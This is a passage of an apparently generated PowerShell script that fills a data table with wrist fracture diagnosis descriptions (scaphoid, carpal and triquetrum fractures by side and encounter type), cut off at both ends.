[scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of distal pole of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of right wrist","Displaced fracture of middle third of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of left wrist","Displaced fracture of middle third of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of middle third of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Displaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist","Nondisplaced fracture of proximal third of navicular [scaphoid] bone of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, right wrist","Fracture of unspecified carpal bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, left wrist","Fracture of unspecified carpal bone, left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified carpal bone, unspecified wrist","Fracture of unspecified carpal bone, unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, right wrist","Displaced fracture of triquetrum [cuneiform] bone, right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of triquetrum [cuneiform] bone, left wrist","Displaced fracture of triquetrum [cuneiform] bone, left wrist, subsequent encounter for fracture with 